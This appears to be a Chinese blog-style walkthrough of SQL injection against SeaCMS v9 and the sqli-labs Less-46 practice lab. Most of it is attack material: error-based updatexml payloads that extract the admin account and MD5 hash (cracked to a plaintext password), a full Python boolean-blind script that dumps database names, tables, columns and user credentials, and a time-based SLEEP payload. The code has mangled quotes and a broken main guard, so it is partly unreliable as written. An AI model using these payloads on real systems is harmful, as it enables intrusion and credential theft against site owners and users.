seacmsv9注入管理员账号密码orderbylimit
seacmsv9注入管理员账号密码+orderby+limit
一、网上收集:
海洋影视管理系统是专为不同需求的站长而设计的视频点播系统,采用的是 php5.X+mysql 的架构
二、经过源码分析,使用以下语句注入:
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@
', updatexml(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @'
三、没有成功,使用Wireshark抓包:
SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment
WHERE m_type=1 AND id in (@
\', updatexml(1,concat_ws(0x20,0x5c,(select name from#sea_admin limit 0,1)),1), @
\') ORDER BY id DESC
四、在地址栏尝试注入语句,成功注入出账号为admin:
password:
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@
', updatexml(1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @'
注入密码为23a7bbd73250516f069d,可以看出是经过md5加密的,于是到https://cmd5.com/ 解密,得到密码为admin123
布尔盲注
import requests
from bs4 import BeautifulSoup
def get_username(resp):
soup = BeautifulSoup(resp,‘html.parser’)
username = soup.select(‘body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)’)[0].text
return username
def inject_database_boolen():
tables = '’
i = 1
while True:
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) – "
resp = requests.get(url)
if ‘Dumb’ == get_username(resp.text):
left = mid + 1
else:
right = mid
mid = (left + right) // 2
if mid == 32:
break
tables += chr(mid)
i += 1
print(tables)
def inject_table_boolen():
tables = '’
i = 1
while True:
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from \
information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) – "
resp = requests.get(url)
if ‘Dumb’ == get_username(resp.text):
left = mid + 1
else:
right = mid
mid = (left + right) // 2
if mid == 32:
break
tables += chr(mid)
i += 1
print(tables)
def inject_column_boolen():
tables = '’
i = 1
while True:
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from \
information_schema.columns where table_schema=database() and table_name=‘users’),{i},1))>{mid},id,username) – "
resp = requests.get(url)
if ‘Dumb’ == get_username(resp.text):
left = mid + 1
else:
right = mid
mid = (left + right) // 2
if mid == 32:
break
tables += chr(mid)
i += 1
print(tables)
def inject_data_boolen():
tables = '’
i = 1
while True:
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,’:’,password) \
from users),{i},1))>{mid},id,username) – "
resp = requests.get(url)
if ‘Dumb’ == get_username(resp.text):
left = mid + 1
else:
right = mid
mid = (left + right) // 2
if mid == 32:
break
tables += chr(mid)
i += 1
print(tables)
if name == ‘main’:
inject_database_boolen()
inject_table_boolen()
inject_column_boolen()
inject_data_boolen()
时间盲注 :
ORDER BY IF((SELECT SUBSTR(password,1,1) FROM sea_admin LIMIT 0,1)='a', SLEEP(5), 1)如果页面响应时间延迟,则说明条件成立;